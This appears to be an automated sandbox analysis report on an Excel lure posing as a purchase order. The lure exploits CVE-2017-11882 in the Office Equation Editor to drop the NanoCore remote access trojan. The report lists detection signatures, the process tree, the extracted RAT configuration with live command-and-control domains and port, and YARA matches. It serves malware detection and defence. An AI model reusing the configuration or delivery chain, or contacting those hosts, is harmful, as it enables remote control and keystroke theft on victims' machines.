Play interactive tour

Edit tour

Analysis Report Purchase Order Price List 061021.xlsx

Overview

General Information

Sample Name:	Purchase Order Price List 061021.xlsx
Analysis ID:	432576
MD5:	9293317a587ed5636aa0863c1c1fc802
SHA1:	718896b0b8a47c9f1a15a62821cb4bee059f1ae6
SHA256:	1cbd45f0443190de9628a94ccd12cd93ec068ff3ad78fc058824de7370ab2af4
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Nanocore Rat

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Yara detected Nanocore RAT

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2620 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2808 cmdline: 'C:\Users\Public\vbc.exe' MD5: 3DEB8B7E51C21CBA0C2C723C5AF953DD)

vbc.exe (PID: 2364 cmdline: 'C:\Users\Public\vbc.exe' MD5: 3DEB8B7E51C21CBA0C2C723C5AF953DD)

opjlpsercy.exe (PID: 2248 cmdline: 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe' MD5: 3DEB8B7E51C21CBA0C2C723C5AF953DD)

opjlpsercy.exe (PID: 2236 cmdline: 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe' MD5: 3DEB8B7E51C21CBA0C2C723C5AF953DD)

opjlpsercy.exe (PID: 2160 cmdline: 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe' MD5: 3DEB8B7E51C21CBA0C2C723C5AF953DD)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101ad:$x1: NanoCore.ClientPluginHost 0x101ea:$x2: IClientNetworkHost 0x13d1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff15:$a: NanoCore 0xff25:$a: NanoCore 0x10159:$a: NanoCore 0x1016d:$a: NanoCore 0x101ad:$a: NanoCore 0xff74:$b: ClientPlugin 0x10176:$b: ClientPlugin 0x101b6:$b: ClientPlugin 0x1009b:$c: ProjectData 0x10aa2:$d: DESCrypto 0x1846e:$e: KeepAlive 0x1645c:$g: LogClientMessage 0x12657:$i: get_Connected 0x10dd8:$j: #=q 0x10e08:$j: #=q 0x10e24:$j: #=q 0x10e54:$j: #=q 0x10e70:$j: #=q 0x10e8c:$j: #=q 0x10ebc:$j: #=q 0x10ed8:$j: #=q
00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x196cf:$a: NanoCore 0x19728:$a: NanoCore 0x19765:$a: NanoCore 0x197de:$a: NanoCore 0x224ee:$a: NanoCore 0x22513:$a: NanoCore 0x2256c:$a: NanoCore 0x327ab:$a: NanoCore 0x327d1:$a: NanoCore 0x3282d:$a: NanoCore 0x3f6cf:$a: NanoCore 0x3f728:$a: NanoCore 0x3f75b:$a: NanoCore 0x3f987:$a: NanoCore 0x3fa03:$a: NanoCore 0x4001c:$a: NanoCore 0x40165:$a: NanoCore 0x40639:$a: NanoCore 0x40920:$a: NanoCore 0x40937:$a: NanoCore 0x45fb1:$a: NanoCore
00000005.00000002.2359682562.0000000005070000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
00000005.00000002.2359682562.0000000005070000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2360175265.00000000057E0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
00000005.00000002.2360175265.00000000057E0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
00000005.00000002.2359948690.00000000055E0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
00000005.00000002.2359948690.00000000055E0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x123e5:$x1: NanoCore.ClientPluginHost 0x12422:$x2: IClientNetworkHost 0x15f55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1214d:$a: NanoCore 0x1215d:$a: NanoCore 0x12391:$a: NanoCore 0x123a5:$a: NanoCore 0x123e5:$a: NanoCore 0x121ac:$b: ClientPlugin 0x123ae:$b: ClientPlugin 0x123ee:$b: ClientPlugin 0x122d3:$c: ProjectData 0x12cda:$d: DESCrypto 0x1a6a6:$e: KeepAlive 0x18694:$g: LogClientMessage 0x1488f:$i: get_Connected 0x13010:$j: #=q 0x13040:$j: #=q 0x1305c:$j: #=q 0x1308c:$j: #=q 0x130a8:$j: #=q 0x130c4:$j: #=q 0x130f4:$j: #=q 0x13110:$j: #=q
00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x139ef5:$a: NanoCore 0x139f4e:$a: NanoCore 0x139f8b:$a: NanoCore 0x13a004:$a: NanoCore 0x142ad8:$a: NanoCore 0x142afd:$a: NanoCore 0x142b56:$a: NanoCore 0x152cf3:$a: NanoCore 0x152d19:$a: NanoCore 0x152d75:$a: NanoCore 0x15fbca:$a: NanoCore 0x15fc23:$a: NanoCore 0x15fc56:$a: NanoCore 0x15fe82:$a: NanoCore 0x15fefe:$a: NanoCore 0x160517:$a: NanoCore 0x160660:$a: NanoCore 0x160b34:$a: NanoCore 0x160e1b:$a: NanoCore 0x160e32:$a: NanoCore 0x1663d0:$a: NanoCore
00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x113a3:$a: NanoCore 0x113fc:$a: NanoCore 0x11439:$a: NanoCore 0x114b2:$a: NanoCore 0x19fb2:$a: NanoCore 0x19fd7:$a: NanoCore 0x1a030:$a: NanoCore 0x2a1db:$a: NanoCore 0x2a201:$a: NanoCore 0x2a25d:$a: NanoCore 0x370bb:$a: NanoCore 0x37114:$a: NanoCore 0x37147:$a: NanoCore 0x37373:$a: NanoCore 0x373ef:$a: NanoCore 0x37a08:$a: NanoCore 0x37b51:$a: NanoCore 0x38025:$a: NanoCore 0x3830c:$a: NanoCore 0x38323:$a: NanoCore 0x3d8c9:$a: NanoCore
00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101ad:$x1: NanoCore.ClientPluginHost 0x101ea:$x2: IClientNetworkHost 0x13d1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff15:$a: NanoCore 0xff25:$a: NanoCore 0x10159:$a: NanoCore 0x1016d:$a: NanoCore 0x101ad:$a: NanoCore 0xff74:$b: ClientPlugin 0x10176:$b: ClientPlugin 0x101b6:$b: ClientPlugin 0x1009b:$c: ProjectData 0x10aa2:$d: DESCrypto 0x1846e:$e: KeepAlive 0x1645c:$g: LogClientMessage 0x12657:$i: get_Connected 0x10dd8:$j: #=q 0x10e08:$j: #=q 0x10e24:$j: #=q 0x10e54:$j: #=q 0x10e70:$j: #=q 0x10e8c:$j: #=q 0x10ebc:$j: #=q 0x10ed8:$j: #=q
00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000005.00000002.2358435982.00000000049D0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000005.00000002.2358435982.00000000049D0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000005.00000002.2360005099.0000000005610000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
00000005.00000002.2360005099.0000000005610000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
